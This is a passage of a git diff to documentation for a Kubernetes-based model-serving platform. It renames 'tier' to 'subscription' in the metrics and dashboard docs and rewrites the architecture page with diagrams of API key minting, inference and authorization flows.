+ output combined). The `model` label is extracted via `responseBodyJSON("/model")`. 
| -| `authorized_calls` | Counter | `user`, `tier`, `limitador_namespace` | Requests allowed (not rate-limited). | -| `limited_calls` | Counter | `user`, `tier`, `limitador_namespace` | Requests denied due to token rate limits. | +| `authorized_hits` | Counter | `user`, `subscription`, `model`, `limitador_namespace` | Total tokens consumed per request (from `usage.total_tokens` in the model response; input + output combined). The `model` label is extracted via `responseBodyJSON("/model")`. | +| `authorized_calls` | Counter | `user`, `subscription`, `limitador_namespace` | Requests allowed (not rate-limited). | +| `limited_calls` | Counter | `user`, `subscription`, `limitador_namespace` | Requests denied due to token rate limits. | !!! note "`model` label availability" - The `model` label is currently available **only on `authorized_hits`**. The `authorized_calls` and `limited_calls` metrics carry `user` and `tier` labels but not `model`, due to how the wasm-shim constructs the CEL evaluation context for these counters. This is a known upstream limitation tracked for improvement in Kuadrant. + The `model` label is currently available **only on `authorized_hits`**. The `authorized_calls` and `limited_calls` metrics carry `user` and `subscription` labels but not `model`, due to how the wasm-shim constructs the CEL evaluation context for these counters. This is a known upstream limitation tracked for improvement in Kuadrant. -Gateway latency is labeled by **tier only** via Istio Telemetry (see [Per-Tier Latency Tracking](#per-tier-latency-tracking)); per-user latency is not exposed on the gateway histogram to keep cardinality bounded. +Gateway latency is labeled by **subscription only** via Istio Telemetry (see [Per-Subscription Latency Tracking](#per-subscription-latency-tracking)); per-user latency is not exposed on the gateway histogram to keep cardinality bounded. 
### Authorino Metrics @@ -191,7 +191,7 @@ When using llm-d, the inference gateway's Endpoint Picker (EPP) exposes addition EPP metrics are not currently scraped or visualized by MaaS. When deploying llm-d with the EPP, refer to the [llm-d monitoring docs](https://llm-d.ai/docs/usage/monitoring) and the [inference gateway dashboard](https://github.com/kubernetes-sigs/gateway-api-inference-extension/blob/v1.0.1/tools/dashboards/inference_gateway.json) for EPP-specific visualization. !!! note "Input/Output Token Split" - vLLM metrics provide input vs output token breakdown **per model** (`vllm:prompt_tokens_total` / `vllm:generation_tokens_total` counters, or `vllm:request_prompt_tokens` / `vllm:request_generation_tokens` histograms). However, these do not carry `user` or `tier` labels. For per-user billing with input/output split, upstream changes to the Kuadrant wasm-shim are required (see [Known Limitations](#known-limitations)). + vLLM metrics provide input vs output token breakdown **per model** (`vllm:prompt_tokens_total` / `vllm:generation_tokens_total` counters, or `vllm:request_prompt_tokens` / `vllm:request_generation_tokens` histograms). However, these do not carry `user` or `subscription` labels. For per-user billing with input/output split, upstream changes to the Kuadrant wasm-shim are required (see [Known Limitations](#known-limitations)). #### Dashboard Metric Queries @@ -277,11 +277,11 @@ Provides a comprehensive view of system health, usage across all users, and reso | **Component Health** | Limitador up, Authorino pods, MaaS API pods, Gateway pods, Firing Alerts | | **Key Metrics** | Total Tokens, Total Requests, Token Rate, Request Rate, Inference Success Rate, Active Users, P50 Response Latency, Rate Limit Ratio | | **Auth Evaluation** | Auth Evaluation Latency (P50/P95/P99), Auth Success/Deny Rate | -| **Traffic Analysis** | Token/Request Rate by Model, Error Rates (4xx excl. 
429, 5xx, 429 Rate Limited), Token/Request Rate by Tier, P95 Latency | +| **Traffic Analysis** | Token/Request Rate by Model, Error Rates (4xx excl. 429, 5xx, 429 Rate Limited), Token/Request Rate by Subscription, P95 Latency | | **Error Breakdown** | Rate Limited Requests, Unauthorized Requests | | **Model Metrics** | vLLM queue depth, inference latency, KV cache usage, token throughput, prompt vs generation token ratio, queue wait time, TTFT, ITL | | **Top Users** | By token usage, by declined requests | -| **Detailed Breakdown** | Token Rate by User, Request Volume by User & Tier | +| **Detailed Breakdown** | Token Rate by User, Request Volume by User & Subscription | | **Resource Allocation** | CPU/Memory/GPU per model pod | !!! note "Template Variables" @@ -306,7 +306,7 @@ Personal usage view for individual developers: |---------|---------| | **Usage Summary** | My Total Tokens, My Total Requests, Token Rate, Request Rate, Rate Limit Ratio, Inference Success Rate | | **Usage Trends** | Token Usage by Model, Usage Trends (tokens vs rate limited) | -| **Detailed Analysis** | Token Volume by Model, Rate Limited by Tier | +| **Detailed Analysis** | Token Volume by Model, Rate Limited by Subscription | !!! note "Inference Success Rate" Both dashboards use `rate()` on vLLM counters (`request_success_total`, `e2e_request_latency_seconds_count`) instead of raw counter values. This handles pod restarts correctly (counters reset independently and raw division produces incorrect results). When no traffic is present, `rate()/rate()` produces `NaN`; the dashboards use `((ratio) >= 0) OR vector(1)` to filter `NaN` and default to 100% (healthy) when no traffic exists. @@ -315,7 +315,7 @@ Personal usage view for individual developers: Both dashboards show **token consumption** (`authorized_hits`) for billing/cost tracking and **request counts** (`authorized_calls`) for capacity planning. Blue panels indicate request metrics; green panels indicate token metrics. !!! 
tip "Per-User Token Billing" - The **Platform Admin dashboard** shows token consumption aggregated by **tier** and **model** for system-level visibility. Per-user token consumption for billing is available via: + The **Platform Admin dashboard** shows token consumption aggregated by **subscription** and **model** for system-level visibility. Per-user token consumption for billing is available via: - **AI Engineer dashboard**: Individual users see their own token usage - **Prometheus API**: Query `sum by (user) (increase(authorized_hits[24h]))` for billing periods @@ -362,33 +362,33 @@ To import into Grafana: | Metric | Description | Labels | |--------|-------------|--------| -| `authorized_hits` | Total tokens consumed (input + output combined, from `usage.total_tokens` in model responses) | `user`, `tier`, `model` | -| `authorized_calls` | Total requests allowed | `user`, `tier` | -| `limited_calls` | Total requests rate-limited | `user`, `tier` | +| `authorized_hits` | Total tokens consumed (input + output combined, from `usage.total_tokens` in model responses) | `user`, `subscription`, `model` | +| `authorized_calls` | Total requests allowed | `user`, `subscription` | +| `limited_calls` | Total requests rate-limited | `user`, `subscription` | !!! tip "When to use which metric" - **Billing/Cost**: Use `authorized_hits` - represents actual token consumption, with `model` label for per-model breakdown - - **API Usage**: Use `authorized_calls` - represents number of API calls (per user, per tier) - - **Rate Limiting**: Use `limited_calls` - shows quota violations (per user, per tier) + - **API Usage**: Use `authorized_calls` - represents number of API calls (per user, per subscription) + - **Rate Limiting**: Use `limited_calls` - shows quota violations (per user, per subscription) !!! note "Total tokens only (input/output split not yet available)" - Token consumption is reported as **total tokens** (prompt + completion) per request. 
The pipeline reads `usage.total_tokens` from the model response via Kuadrant's TokenRateLimitPolicy. Separate input-token (`prompt_tokens`) and output-token (`completion_tokens`) counters are **not yet available** at the gateway level; this would require upstream changes in the Kuadrant wasm-shim to send separate `hits_addend` values for each token type. Chargeback and usage tracking per user, per subscription (tier), and per model are supported using `authorized_hits`. + Token consumption is reported as **total tokens** (prompt + completion) per request. The pipeline reads `usage.total_tokens` from the model response via Kuadrant's TokenRateLimitPolicy. Separate input-token (`prompt_tokens`) and output-token (`completion_tokens`) counters are **not yet available** at the gateway level; this would require upstream changes in the Kuadrant wasm-shim to send separate `hits_addend` values for each token type. Chargeback and usage tracking per user, per subscription, and per model are supported using `authorized_hits`. ### Latency Metrics | Metric | Description | Labels | |--------|-------------|--------| -| `istio_request_duration_milliseconds_bucket` | Gateway-level latency histogram | `destination_service_name`, `tier` | +| `istio_request_duration_milliseconds_bucket` | Gateway-level latency histogram | `destination_service_name`, `subscription` | | `vllm:e2e_request_latency_seconds` | Model inference latency | `model_name` | -#### Per-Tier Latency Tracking +#### Per-Subscription Latency Tracking -The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to gateway latency metrics. This enables tracking request latency per access tier (e.g. free, premium, enterprise). Gateway latency is labeled by **tier only** (not by user) to keep metric cardinality bounded and to align with latency-by-tier requirements (e.g. P50/P95/P99 per tier). Per-user metrics remain available from Limitador (`authorized_hits`, `authorized_calls`, `limited_calls`). 
+The MaaS Platform uses an Istio Telemetry resource to add a `subscription` dimension to gateway latency metrics. This enables tracking request latency per subscription (e.g. free, premium, enterprise). Gateway latency is labeled by **subscription only** (not by user) to keep metric cardinality bounded and to align with latency-by-subscription requirements (e.g. P50/P95/P99 per subscription). Per-user metrics remain available from Limitador (`authorized_hits`, `authorized_calls`, `limited_calls`). **How it works:** -1. The `gateway-auth-policy` injects the `X-MaaS-Tier` header from the resolved tier -2. The Istio Telemetry resource extracts this header and adds it as a `tier` label to the `REQUEST_DURATION` metric +1. The `gateway-auth-policy` injects the `X-MaaS-Subscription` header from the resolved subscription +2. The Istio Telemetry resource extracts this header and adds it as a `subscription` label to the `REQUEST_DURATION` metric 3. Prometheus scrapes these metrics from the Istio gateway **Configuration** (`deployment/base/observability/istio-gateway-telemetry.yaml`): @@ -396,7 +396,7 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to apiVersion: telemetry.istio.io/v1 kind: Telemetry metadata: - name: latency-per-tier + name: latency-per-subscription namespace: openshift-ingress spec: selector: @@ -410,12 +410,12 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to metric: REQUEST_DURATION mode: CLIENT_AND_SERVER tagOverrides: - tier: + subscription: operation: UPSERT - value: request.headers["x-maas-tier"] + value: request.headers["x-maas-subscription"] !!! note "Security" - The `X-MaaS-Tier` header should be injected server-side by AuthPolicy. Ensure your AuthPolicy injects this header from the tier lookup (not client input) for accurate metrics attribution. + The `X-MaaS-Subscription` header should be injected server-side by AuthPolicy. 
Ensure your AuthPolicy injects this header from the subscription selection (not client input) for accurate metrics attribution. ### Common Queries @@ -430,16 +430,16 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to # Top 10 users by tokens consumed topk(10, sum by (user) (authorized_hits)) - # Token consumption by tier - sum by (tier) (authorized_hits) + # Token consumption by subscription + sum by (subscription) (authorized_hits) **Request-based queries (capacity/usage):** # Total requests per user sum by (user) (authorized_calls) - # Request rate per tier (requests/sec) - sum by (tier) (rate(authorized_calls[5m])) + # Request rate per subscription (requests/sec) + sum by (subscription) (rate(authorized_calls[5m])) # Top 10 users by request count topk(10, sum by (user) (authorized_calls)) @@ -455,11 +455,11 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to # Rate limit ratio (percentage of requests rejected by rate limiting) (sum(limited_calls) / (sum(authorized_calls) + sum(limited_calls))) OR vector(0) - # Rate limit ratio by tier - (sum by (tier) (limited_calls) / (sum by (tier) (authorized_calls) + sum by (tier) (limited_calls))) OR vector(0) + # Rate limit ratio by subscription + (sum by (subscription) (limited_calls) / (sum by (subscription) (authorized_calls) + sum by (subscription) (limited_calls))) OR vector(0) - # Rate limit violations per second by tier - sum by (tier) (rate(limited_calls[5m])) + # Rate limit violations per second by subscription + sum by (subscription) (rate(limited_calls[5m])) # Users hitting rate limits most topk(10, sum by (user) (limited_calls)) @@ -472,11 +472,11 @@ The MaaS Platform uses an Istio Telemetry resource to add a `tier` dimension to # P50 (median) latency histogram_quantile(0.5, sum by (le) (rate(istio_request_duration_milliseconds_bucket[5m]))) - # P99 latency per tier - histogram_quantile(0.99, sum by (tier, le) 
(rate(istio_request_duration_milliseconds_bucket{tier!=""}[5m]))) + # P99 latency per subscription + histogram_quantile(0.99, sum by (subscription, le) (rate(istio_request_duration_milliseconds_bucket{subscription!=""}[5m]))) -!!! tip "Filtering by tier" - For per-tier latency queries, use `tier!=""` to exclude requests where the `X-MaaS-Tier` header was not injected. Token consumption metrics (`authorized_hits`, `authorized_calls`) from Limitador already only include successful requests. +!!! tip "Filtering by subscription" + For per-subscription latency queries, use `subscription!=""` to exclude requests where the `X-MaaS-Subscription` header was not injected. Token consumption metrics (`authorized_hits`, `authorized_calls`) from Limitador already only include successful requests. ## Maintenance @@ -500,7 +500,7 @@ Some features require upstream changes and are currently blocked: | Feature | Blocker | Workaround | |---------|---------|------------| -| **`model` label on `authorized_calls` / `limited_calls`** | Kuadrant wasm-shim does not pass `responseBodyJSON` context for these counters | Use `authorized_hits` for per-model breakdown; `authorized_calls`/`limited_calls` support per-user and per-tier | +| **`model` label on `authorized_calls` / `limited_calls`** | Kuadrant wasm-shim does not pass `responseBodyJSON` context for these counters | Use `authorized_hits` for per-model breakdown; `authorized_calls`/`limited_calls` support per-user and per-subscription | | **Input/output token split** | Kuadrant TokenRateLimitPolicy sends a single `hits_addend` (total tokens); no mechanism for separate prompt/completion counters | Total tokens available via `authorized_hits`; the response body contains `usage.prompt_tokens` and `usage.completion_tokens` but the wasm-shim does not split them | | **Input/output token breakdown per user** | vLLM does not label its own metrics with `user` | Total tokens per user available via `authorized_hits{user="..."}`; vLLM 
prompt/generation token metrics are per-model only | | **Kuadrant policy health metrics** | `kuadrant_policies_enforced`, `kuadrant_policies_total` etc. are defined in Kuadrant dev but not yet shipped in RHCL 1.x | Enable `observability.enable: true` on the Kuadrant CR; the ServiceMonitors are created but policy-specific gauges will appear in a future operator release | @@ -511,27 +511,27 @@ Some features require upstream changes and are currently blocked: !!! note "Total Tokens vs Token Breakdown" Total token consumption per user **is available** via `authorized_hits{user="..."}`. The blocked feature is the input/output split (prompt vs generation tokens) at the gateway level, which requires the wasm-shim to send two separate counter updates to Limitador. -### Available Per-User and Per-Tier Metrics +### Available Per-User and Per-Subscription Metrics | Feature | Metric | Label | |---------|--------|-------| -| **Latency per tier** | `istio_request_duration_milliseconds_bucket` | `tier` | +| **Latency per subscription** | `istio_request_duration_milliseconds_bucket` | `subscription` | | **Token consumption per user** | `authorized_hits` | `user` | -| **Token consumption per tier** | `authorized_hits` | `tier` | +| **Token consumption per subscription** | `authorized_hits` | `subscription` | | **Token consumption per model** | `authorized_hits` | `model` | | **Requests per user** | `authorized_calls` | `user` | -| **Requests per tier** | `authorized_calls` | `tier` | +| **Requests per subscription** | `authorized_calls` | `subscription` | | **Rate limited per user** | `limited_calls` | `user` | -| **Rate limited per tier** | `limited_calls` | `tier` | +| **Rate limited per subscription** | `limited_calls` | `subscription` | ### Requirements Alignment | Requirement | Status | Notes | |-------------|--------|-------| -| **Usage dashboards** (token consumption per user, per subscription/tier, per model) | Met | Grafana dashboard + `authorized_hits` with `user`, 
`tier`, `model`; Prometheus scrapes Limitador `/metrics`. | -| **Latency by tier** (P50/P95/P99) | Met | `istio_request_duration_milliseconds_bucket` with `tier` label; tier-only avoids unbounded cardinality. | -| **Request tracking** (per user, per tier) | Met | `authorized_calls` with `user` and `tier` labels; `limited_calls` for rate-limit violations. | -| **Export for chargeback** (CSV/API) | Not provided (RFE) | Per-user token data exists in Prometheus (`authorized_hits{user="..."}`) but no dedicated billing API or export endpoint is implemented. **RFE recommendation**: Add `/maas-api/v1/usage` endpoint that queries Prometheus and returns per-user, per-tier, per-model token consumption in CSV/JSON for finance and chargeback systems. | +| **Usage dashboards** (token consumption per user, per subscription, per model) | Met | Grafana dashboard + `authorized_hits` with `user`, `subscription`, `model`; Prometheus scrapes Limitador `/metrics`. | +| **Latency by subscription** (P50/P95/P99) | Met | `istio_request_duration_milliseconds_bucket` with `subscription` label; subscription-only avoids unbounded cardinality. | +| **Request tracking** (per user, per subscription) | Met | `authorized_calls` with `user` and `subscription` labels; `limited_calls` for rate-limit violations. | +| **Export for chargeback** (CSV/API) | Not provided (RFE) | Per-user token data exists in Prometheus (`authorized_hits{user="..."}`) but no dedicated billing API or export endpoint is implemented. **RFE recommendation**: Add `/maas-api/v1/usage` endpoint that queries Prometheus and returns per-user, per-subscription, per-model token consumption in CSV/JSON for finance and chargeback systems. | | **Input/output token split** | Not available | Only total tokens (`authorized_hits`); separate input and output counters require upstream Kuadrant wasm-shim changes to send split `hits_addend` values. 
| | **`model` label on request/rate-limit counters** | Partial | `model` available on `authorized_hits` only; requires upstream Kuadrant fix to propagate `responseBodyJSON` context to `authorized_calls`/`limited_calls` counters. | | **Policy enforcement health** | Future | Kuadrant operator metrics (`kuadrant_policies_enforced`, `kuadrant_ready`, etc.) defined upstream but not yet shipped in RHCL 1.x; `limitador_up` and `datastore_partitioned` are available now. | diff --git a/docs/content/advanced-administration/subscription-cardinality.md b/docs/content/advanced-administration/subscription-cardinality.md new file mode 100644 index 000000000..b9116728f --- /dev/null +++ b/docs/content/advanced-administration/subscription-cardinality.md @@ -0,0 +1,14 @@ +# Subscription and Policy Cardinality + +MaaSAuthPolicy and MaaSSubscription support both `groups` and `users` in their subject/owner configuration. Using `users` for many individual human users can cause cardinality issues in the rate-limiting and policy enforcement layer (Limitador, Authorino), which may impact performance and scalability. + +**Recommendation:** Prefer `groups` for human users. Reserve the `users` field for Service Accounts and other programmatic identities where the number of distinct users remains small. + +!!! note "See also" + For configuration guidance, see [Quota and Access Configuration](../configuration-and-management/quota-and-access-configuration.md). 
+ +## TODO + +- [ ] Document cardinality limits and observed impact +- [ ] Provide guidance on when `users` is appropriate vs `groups` +- [ ] Add monitoring and troubleshooting notes for cardinality-related issues diff --git a/docs/content/api/openapi3.yaml b/docs/content/api/openapi3.yaml new file mode 120000 index 000000000..0330b9a23 --- /dev/null +++ b/docs/content/api/openapi3.yaml @@ -0,0 +1 @@ +../../../maas-api/openapi3.yaml \ No newline at end of file diff --git a/docs/content/architecture.md b/docs/content/architecture.md index f514f3c6b..183420d5b 100644 --- a/docs/content/architecture.md +++ b/docs/content/architecture.md @@ -2,232 +2,293 @@ ## Overview -The MaaS Platform is designed as a cloud-native, Kubernetes-based solution that provides policy-based access control, rate limiting, and tier-based subscriptions for AI model serving. The architecture follows microservices principles and leverages OpenShift/Kubernetes native components for scalability and reliability. +The MaaS Platform is a Kubernetes-native layer for AI model serving built on [Gateway API](https://gateway-api.sigs.k8s.io/) and policy controllers ([Kuadrant](https://docs.kuadrant.io/), [Authorino](https://docs.kuadrant.io/1.0.x/authorino/), [Limitador](https://docs.kuadrant.io/1.0.x/limitador/)). It provides policy-based authentication and authorization, plus subscription-based rate limiting. Future work includes improved request routing and discovery. ## Architecture ### 🏗️ High-Level Architecture -The MaaS Platform is an end-to-end solution that leverages Kuadrant (Red Hat Connectivity Link) and Open Data Hub (Red Hat OpenShift AI)'s Model Serving capabilities to provide a fully managed, scalable, and secure self-service platform for AI model serving. +The MaaS Platform is an end-to-end solution built on [Kuadrant](https://docs.kuadrant.io/). 
-**All requests flow through the maas-default-gateway and RHCL components**, which then route requests based on the path: +All traffic flows through the Gateway **maas-default-gateway** (Gateway API). It then uses [Authorino](https://docs.kuadrant.io/1.0.x/authorino/) to enforce authentication and authorization, and [Limitador](https://docs.kuadrant.io/1.0.x/limitador/) to enforce and track token usage. Auth policies use **caching** (e.g., subscription selection results, API key validation) to reduce latency on the hot path. -- `/maas-api/*` requests → MaaS API (token retrieval, validates OpenShift Token via RHCL) -- Inference requests (`/v1/models`, `/v1/chat/completions`) → Model Serving (validates Service Account Token via RHCL) +**Main Flows:** + +- **Key Minting** — For obtaining API keys to authenticate programmatic access. +- **Inference** — For calling models to generate completions. ```mermaid graph TB - subgraph "User Layer" - User[Users] + subgraph UserLayer["User Layer"] + User[User] end - subgraph "Gateway & Policy Layer" - GatewayAPI["maas-default-gateway
All Traffic Entry Point"] - AuthPolicy["Auth Policy
Authorino
Token Validation"] - RateLimit["Rate Limiting
Limitador
Usage Quotas"] + subgraph GatewayPolicyLayer["Gateway & Policy Layer"] + Gateway[Gateway] + AuthPolicy[AuthPolicy] + MaaSAuthPolicy[MaaSAuthPolicy] + MaaSSubscription[MaaSSubscription] end - subgraph "Token Management Path" - MaaSAPI["MaaS API
Token Retrieval"] + subgraph TokenManagementLayer["Token Management Layer"] + MaaSAPI[MaaS API] end - subgraph "Model Serving Path" - PathInference["Inference Service"] - ModelServing["RHOAI Model Serving"] + subgraph ModelServingLayer["Model Serving Layer"] + InferenceService[Inference Service] + LLM[LLM] end - User -->|"All Requests"| GatewayAPI - GatewayAPI -->|"All Traffic"| AuthPolicy + User -->|"Request Key"| Gateway + Gateway --> AuthPolicy + AuthPolicy --> MaaSAPI + MaaSAPI -->|"Return API Key"| User - AuthPolicy -->|"/maas-api
Auth Only"| MaaSAPI - MaaSAPI -->|"Returns Token"| User + User -->|"Inference"| Gateway + Gateway --> MaaSAuthPolicy + MaaSAuthPolicy -.->|"Validate API Key"| MaaSAPI + MaaSAuthPolicy -->|"Rate Limit"| MaaSSubscription + MaaSSubscription --> InferenceService + InferenceService --> LLM + LLM -->|"Return Response"| User - AuthPolicy -->|"Inference Traffic
Auth + Rate Limit"| RateLimit - RateLimit --> PathInference - PathInference --> ModelServing - ModelServing -->|"Returns Response"| User + linkStyle 0,1,2,3 stroke:#1976d2,stroke-width:2px + linkStyle 4,5,6,7,8,9,10 stroke:#388e3c,stroke-width:2px style MaaSAPI fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff - style GatewayAPI fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff - style AuthPolicy fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff - style RateLimit fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff - style PathInference fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff - style ModelServing fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff + style Gateway fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff + style AuthPolicy fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style MaaSAuthPolicy fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style MaaSSubscription fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style InferenceService fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff + style LLM fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff +``` + +### Key Minting Flow — Request & Validation + +**Flow summary:** + +1. User sends `POST /v1/api-keys` with Bearer `{oc-token}`. +2. Gateway routes the request to AuthPolicy (Authorino). +3. AuthPolicy validates the OpenShift token via TokenReview. +4. Gateway forwards the authenticated request and user context to the Key Minting Service. + +```mermaid +graph TB + subgraph UserLayer["User"] + U[User] + end + + subgraph GatewayLayer["Gateway & Policy"] + G[Gateway] + AP[AuthPolicy
Authorino] + end + + subgraph KeyMintingLayer["MaaS API"] + KMS[MaaS API] + end + + U -->|"1. POST /v1/api-keys
Bearer {oc-token}"| G + G -->|"2. Route /maas-api"| AP + AP -->|"3. TokenReview
validate OpenShift token"| G + G -->|"4. Forward + user context"| KMS + + style KMS fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff + style G fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff + style AP fill:#e65100,stroke:#333,stroke-width:2px,color:#fff ``` -### Architecture Details +!!! Tip "Future Plans" + Today, validation uses the **OpenShift token flow** (TokenReview). Future plans include optional integration with other OIDC providers (e.g., external IdPs, Keycloak). -The MaaS Platform architecture is designed to be modular and scalable. It is composed of the following components: -- **maas-default-gateway**: The single entry point for all traffic (both token requests and inference requests). -- **RHCL (Red Hat Connectivity Link)**: The policy engine that handles authentication and authorization for all requests. Routes requests to appropriate backend based on path: - - `/maas-api/*` → MaaS API (validates OpenShift tokens) - - Inference paths (`/v1/models`, `/v1/chat/completions`) → Model Serving (validates Service Account tokens) -- **MaaS API**: The central component for token generation and management, accessed via `/maas-api` path. -- **Open Data Hub (Red Hat OpenShift AI)**: The model serving platform that handles inference requests. +### Key Minting Service (Default Implementation) -### Detailed Component Architecture +**Flow summary:** -#### MaaS API Component Details +1. Gateway forwards the authenticated request and user context to the Key Minting Service (MaaS API). +2. The service generates a random `sk-oai-*` key and hashes it with SHA-256. +3. Only the hash and metadata (username, groups, name, optional `expiresAt` when TTL is set) are stored in PostgreSQL. +4. The plaintext key is returned to the user **once**, along with `expiresAt` when a TTL was specified; the key cannot be retrieved again. -The MaaS API provides a self-service platform for users to request tokens for their inference requests. 
All requests to the MaaS API pass through the `maas-default-gateway` where authentication is performed against the user's OpenShift token via the Auth Policy component. By leveraging Kubernetes native objects like ConfigMaps and ServiceAccounts, it offers model owners a simple way to configure access to their models based on a familiar group-based access control model. +Keys can be permanent (no expiration) or have an optional **TTL** (`expiresIn`, e.g., `30d`, `90d`, `1h`); the response includes `expiresAt` when a TTL is set. ```mermaid graph TB - subgraph "External Access" - User[Users] - AdminUI[Admin/User UI] + subgraph UserLayer["User"] + U[User] end - subgraph "Gateway & Auth" - Gateway[**maas-default-gateway**
Entry Point] - AuthPolicy[**Auth Policy**
Validates OpenShift Token] + subgraph GatewayLayer["Gateway & Policy"] + G[Gateway] end - subgraph "MaaS API Service" - API[**MaaS API**
Go + Gin Framework] - TierMapping[**Tier Mapping Logic**] - TokenGen[**Service Account Token Generation**] + subgraph KeyMintingService["Key Minting Service (Default)"] + API[MaaS API] + Gen[Generate sk-oai-* key] + Hash[Hash with SHA-256] end - subgraph "Configuration" - ConfigMap[**ConfigMap**
tier-to-group-mapping] - K8sGroups[**Kubernetes Groups**
tier-free-users
tier-premium-users
tier-enterprise-users] + subgraph Storage["Storage (Default)"] + DB[(PostgreSQL
key hashes + metadata + TTL)] end - subgraph "free namespace" - FreeSA1[**ServiceAccount**
freeuser1-sa] - FreeSA2[**ServiceAccount**
freeuser2-sa] + U --> G + G -->|"Forward + user context"| API + API --> Gen + Gen --> Hash + Hash -->|"Store hash + expiresAt"| DB + API -->|"Return key ONCE"| U + + style API fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff + style G fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff + style DB fill:#336791,stroke:#333,stroke-width:2px,color:#fff +``` + +!!! tip "Future Plans" + This is the **default implementation**. Future plans include integration with other key store providers (e.g., HashiCorp Vault, cloud secret managers). + +!!! note "PostgreSQL" + A **PostgreSQL database is required** and is **not included** with the MaaS deployment. The deploy script provides a basic PostgreSQL deployment for development and testing—**this is not intended for production use**. For production, provision and configure your own PostgreSQL instance. + +### Inference Flow — Through MaaS Objects + +**Flow summary:** + +1. User sends inference request with an API key. +2. Gateway routes to MaaSAuthPolicy (Authorino). +3. MaaSAuthPolicy validates the key via MaaS API and selects subscription; on failure returns 401/403. +4. MaaSSubscription (Limitador) checks token rate limits; on exceed returns 429. +5. Request reaches Inference Service and LLM; completion returned to user. + +```mermaid +graph TB + subgraph UserLayer["User"] + U[User] end - subgraph "premium namespace" - PremiumSA1[**ServiceAccount**
prem-user1-sa] + subgraph GatewayLayer["Gateway & Policy"] + G[Gateway] + MAP[MaaSAuthPolicy
Authorino] + MS[MaaSSubscription
Limitador] end - subgraph "enterprise namespace" - EnterpriseSA1[**ServiceAccount**
ent-user1-sa] + subgraph MaaSLayer["Token Management"] + API[MaaS API] end - User -->|"Request with
OpenShift Token"| Gateway - AdminUI -->|"Request with
OpenShift Token"| Gateway - Gateway -->|"/maas-api path"| AuthPolicy - AuthPolicy -->|"Authenticated Request"| API + subgraph ModelLayer["Model Serving"] + INV[Inference Service] + LLM[LLM] + end - API --> TierMapping - API --> TokenGen + U -->|"1. Inference + API key"| G + G -->|"2. Route"| MAP + MAP -.->|"3. Validate key"| API + MAP -->|"4. Auth OK"| MS + MS -->|"5. Within limits"| INV + INV -->|"6. Forward"| LLM + LLM -->|"7. Completion"| U - TierMapping --> ConfigMap - ConfigMap -->|Maps Groups to Tiers| K8sGroups - TokenGen --> FreeSA1 - TokenGen --> FreeSA2 - TokenGen --> PremiumSA1 - TokenGen --> EnterpriseSA1 + MAP -.->|"401/403"| U + MS -.->|"429"| U - K8sGroups -->|Group Membership| TierMapping + linkStyle 7 stroke:#c62828,stroke-width:2px,stroke-dasharray:5,5 + linkStyle 8 stroke:#c62828,stroke-width:2px,stroke-dasharray:5,5 style API fill:#1976d2,stroke:#333,stroke-width:2px,color:#fff - style ConfigMap fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff - style K8sGroups fill:#f57c00,stroke:#333,stroke-width:2px,color:#fff - style FreeSA1 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff - style FreeSA2 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff - style PremiumSA1 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff - style EnterpriseSA1 fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff + style G fill:#7b1fa2,stroke:#333,stroke-width:2px,color:#fff + style MAP fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style MS fill:#e65100,stroke:#333,stroke-width:2px,color:#fff + style INV fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff + style LLM fill:#388e3c,stroke:#333,stroke-width:2px,color:#fff ``` -**Key Features:** +### Auth & Validation Flow (Deep Dive) -- **Tier-to-Group Mapping**: Uses ConfigMap in the same namespace as MaaS API to map Kubernetes groups to tiers -- **Configurable Tiers**: Out of the box, the MaaS Platform comes with three default tiers: free, premium, and enterprise. 
These tiers are configurable and can be extended to support more tiers as needed. -- **Service Account Tokens**: Generates tokens for the appropriate tier's service account based on user's group membership -- **Future Enhancements**: Planned improvements for more sophisticated token management and the ability to integrate with external identity providers. +The MaaSAuthPolicy delegates to the MaaS API for key validation and subscription selection. The subscription name comes from the PostgreSQL key record (set at key creation). -#### Inference Service Component Details +**Flow summary:** -Once a user has obtained their token through the MaaS API, they can use it to make inference requests to the Gateway API. RHCL's Application Connectivity Policies then validate the token and enforce access control and rate limiting policies: +1. Authorino calls MaaS API to validate the API key. +2. MaaS API validates the key (format, not revoked, not expired) and returns username, groups, and subscription. +3. Authorino calls MaaS API to check subscription (groups, username, requested subscription from the key). +4. If the user lacks access to the requested subscription → error (403). +5. On success, returns selected subscription; Authorino caches the result (e.g., 60s TTL). AuthPolicy may inject `X-MaaS-Subscription` **server-side** for downstream rate limiting and metrics. Clients do not send this header on inference; subscription comes from the API key record created at mint time. ```mermaid graph TB - subgraph "Client Layer" - Client[Client Applications
with Service Account Token] + subgraph AuthLayer["MaaSAuthPolicy (Authorino)"] + A[Authorino] end - subgraph "Gateway Layer" - GatewayAPI[**maas-default-gateway**
maas.CLUSTER_DOMAIN] - Envoy[**Envoy Proxy**] + subgraph MaaSLayer["MaaS API"] + Validate[Validate API Key] + SubSelect[Check Subscription] end - subgraph "RHCL Policy Engine" - Kuadrant[**Kuadrant**
Policy Attachment] - Authorino[**Authorino**
Authentication Service] - Limitador[**Limitador**
